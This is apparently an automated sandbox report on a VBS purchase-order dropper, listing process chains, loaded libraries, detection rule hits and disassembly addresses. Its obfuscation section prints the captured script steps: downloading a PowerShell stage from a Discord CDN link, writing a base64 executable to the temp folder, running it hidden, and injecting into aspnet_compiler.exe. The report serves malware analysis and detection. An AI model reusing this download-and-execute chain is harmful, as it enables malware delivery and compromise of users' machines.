          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB2C05_2_010AB2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011312ED5_2_011312ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010905355_2_01090535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011475715_2_01147571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011505915_2_01150591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112D5B05_2_0112D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114F43F5_2_0114F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011424465_2_01142446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010814605_2_01081460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113E4F65_2_0113E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B47505_2_010B4750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010907705_2_01090770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114F7B05_2_0114F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108C7C05_2_0108C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011416CC5_2_011416CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AC6E05_2_010AC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010999505_2_01099950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AB9505_2_010AB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A69625_2_010A6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010929A05_2_010929A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0115A9A65_2_0115A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010FD8005_2_010FD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010928405_2_01092840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109A8405_2_0109A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010768B85_2_010768B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010938E05_2_010938E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BE8F05_2_010BE8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114AB405_2_0114AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114FB765_2_0114FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AFB805_2_010AFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01146BD75_2_01146BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010CDBF95_2_010CDBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01147A465_2_01147A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114FA495_2_0114FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01103A6C5_2_01103A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108EA805_2_0108EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D5AA05_2_010D5AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0112DAAC5_2_0112DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0113DAC65_2_0113DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0109AD005_2_0109AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01093D405_2_01093D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01141D5A5_2_01141D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01147D735_2_01147D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A8DBF5_2_010A8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010AFDC05_2_010AFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0108ADE05_2_0108ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090C005_2_01090C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01109C325_2_01109C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01130CB55_2_01130CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114FCF25_2_0114FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01080CF25_2_01080CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114FF095_2_0114FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010D2F285_2_010D2F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B0F305_2_010B0F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01104F405_2_01104F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01091F925_2_01091F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114FFB15_2_0114FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01082FC85_2_01082FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114EE265_2_0114EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01090E595_2_01090E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114CE935_2_0114CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010A2E905_2_010A2E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01099EB05_2_01099EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0114EEDB5_2_0114EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0110F290 appears 105 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010C5130 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010FEA12 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0107B970 appears 251 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 010D7E54 appears 86 times
          Source: PO_11171111221.Vbs.vbsInitial sample: Strings found which are bigger than 50
          Source: Process Memory Space: powershell.exe PID: 1216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: x.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: x.exe.1.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
          Source: 1.2.powershell.exe.1efd11c4300.0.raw.unpack, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@11/7@1/1
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\fore[1].ps1Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1148:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4408:120:WilError_03
          Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs"
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: PO_11171111221.Vbs.vbsVirustotal: Detection: 14%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000005.00000002.1998243490.0000000001050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: VXCVNXC233.pdb source: powershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, x.exe.1.dr

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "https://cdn.discordapp.com/attachments/1295304757166080020/1316923696", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.status();IFileSystem3.FileExists("C:\Temp\dddddd.ps1");IFileSystem3.CreateTextFile("C:\Temp\dddddd.ps1", "true");IServerXMLHTTPRequest2.responseText();ITextStream.Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC");ITextStream.Close();IWshShell3.Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.", "0", "true")
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAE
          Source: x.exe.1.drStatic PE information: 0xA609CD46 [Wed Apr 10 10:30:30 2058 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004119DD push edx; ret 5_2_004119DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00403270 push eax; ret 5_2_00403272
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0040D389 push edi; ret 5_2_0040D38A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00413DCC push ebx; iretd 5_2_00413DDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00413DD3 push ebx; iretd 5_2_00413DDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041F6D6 push ds; ret 5_2_0041F6D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041F7F4 push ebx; ret 5_2_0041F7F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010809AD push ecx; mov dword ptr [esp], ecx5_2_010809B6
          Source: x.exe.1.drStatic PE information: section name: .text entropy: 7.915163773280565
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
